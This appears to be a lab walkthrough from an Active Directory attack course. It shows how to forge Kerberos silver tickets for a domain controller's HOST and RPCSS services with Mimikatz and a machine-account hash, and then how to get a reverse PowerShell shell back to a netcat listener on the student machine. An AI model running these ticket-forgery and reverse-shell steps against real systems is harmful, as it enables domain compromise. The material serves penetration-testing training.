search

Obj 9 Silver Ticket for Host

Task Get command execution on DC by creating a silver ticket for Host Service, WMI.

circle-check

From the information gathered in previous steps we have the hash for machine account of the domain controller (dcorp-dc$). We are going to use this information to create a silver ticket for the Host service on the DC.

hashtag
Run the following command from an elevated shell

hashtag
Silver Ticket - BetterSafetyKatz

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:1e16be70054d1c5999aa53994e03e59c/startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

hashtag
Silver Ticket - Mimikatz

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:1e16be70054d1c5999aa53994e03e59c/startoffset:0 /endin:600 /renewmax:10080 /ptt"'

hashtag
Start a netcat listener on the student vm

nc64.exe -lvnp 443

hashtag
We need to run a modified reverse powershell script

Create a copy of Invoke-PowerShellTcp.ps1 and rename it to Invoke-PowerShellTcpEx.ps1.
-Open Invoke-PowerShellTcpEx.ps1 in PowerShell ISE (Right click on it and click Edit).
-Add Power -Reverse -IPAddress 172.16.100.X-Port 443
to the end of the file.
circle-info

Remember to serve this newly created file up on HFS.exe or similar

hashtag
Now, Lets create a task on the DC to download our new script

hashtag
Now we can run the task to run our script

hashtag
We should have gotten a call back on our listener as nt/authority!

hashtag
- PART 2 - This is the same result as above just another way to do it

circle-info

For accessing WMI, we need to create two tickets –one for HOST service and another for RPCSS.Run the below commands from an elevated shell:

hashtag
Create Silver Ticket

hashtag
Inject a ticket for RPCSS

hashtag
Check to make sure the ticket is present

circle-info

#0> Client: Administrator @ dollarcorp.moneycorp.local

Server: RPCSS/dcorp-dc.dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)Ticket Flags 0x40a00000 -> forwardable renewable pre_authentStart Time: 11/16/2021 13:36:23 (local)End Time: 11/16/2021 23:36:23 (local)Renew Time: 11/23/2021 13:36:23 (local)Session Key Type: RSADSI RC4-HMAC(NT)Cache Flags: 0Kdc Called:

#1> Client: Administrator @ dollarcorp.moneycorp.local

Server: HOST/dcorp-dc.dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local

hashtag
Now we can try to run WMI commands on the DC

PreviousObj 8 Golden Ticket / DCSyncNextObj 10 Skeleton Key

Last updated